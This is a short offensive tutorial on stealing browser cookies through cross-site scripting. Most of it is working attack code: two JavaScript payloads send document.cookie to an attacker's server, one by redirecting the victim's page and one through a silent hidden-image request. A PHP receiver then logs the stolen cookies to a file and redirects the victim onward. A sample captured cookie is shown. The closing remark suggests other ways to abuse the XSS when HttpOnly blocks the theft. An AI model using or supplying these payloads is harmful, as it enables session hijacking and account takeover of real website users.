XSS Cookie Stealer

Two ways to get the victim's cookies out of the page once you have script execution:

  • Redirection
  • Hidden image load

Trigger a redirect from the vulnerable target to your cookie stealer (simple, but the victim sees the navigation):

<script type="text/javascript">
// Visible to the victim: the page navigates away to the stealer.
// encodeURIComponent keeps '&', '#', '+' and '=' inside cookie values from being read as URL syntax.
location.href = 'https://myserver.com/stealer.php?cookie=' + encodeURIComponent(document.cookie);
</script>

Or load a hidden image (the request is sent but nothing is rendered, so the victim stays on the page):

<script type="text/javascript">
// Silent: the browser fetches the URL to load the "image", the response is never displayed
var image = new Image();
image.src = 'https://myserver.com/stealer.php?cookie=' + encodeURIComponent(document.cookie);
</script>

Then set up the receiver (stealer.php) on your server:

<?php
// Cookie string sent by the payload (empty if the parameter is missing)
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
// Log file, and the size above which it is truncated
$filename = 'intercept.txt';
$MAX_SIZE = 4096;
// If data is available, append it to the log
if ($cookie !== '') {
  // Quick guard against the file growing forever: once it passes
  // $MAX_SIZE it is truncated, which discards the earlier entries
  if (file_exists($filename) && filesize($filename) > $MAX_SIZE) {
    $option = 'w';
  } else {
    $option = 'a';
  }
  $fp = fopen($filename, $option);
  if ($fp) {
    // Double quotes are required: in single quotes '\r\n' is written literally, not as a line break
    fputs($fp, $cookie . "\r\n");
    fclose($fp);
  }
}
// Send the victim on to an innocuous page. This only matters for the redirect
// payload; with the image payload the response is never rendered.
?>
<script>location.replace('https://losnia.com');</script>

Each hit appends one line to intercept.txt, for example:

PRIVILEGE_COOKIE=IsI9P7dLS8oIOq4ckeNM2WfD6

Only cookies readable from JavaScript show up here: a cookie set with the HttpOnly flag is not exposed through document.cookie, so if the session cookie is HttpOnly this technique yields nothing and the XSS has to be used another way (for example by making requests from the victim's browser instead of stealing the token).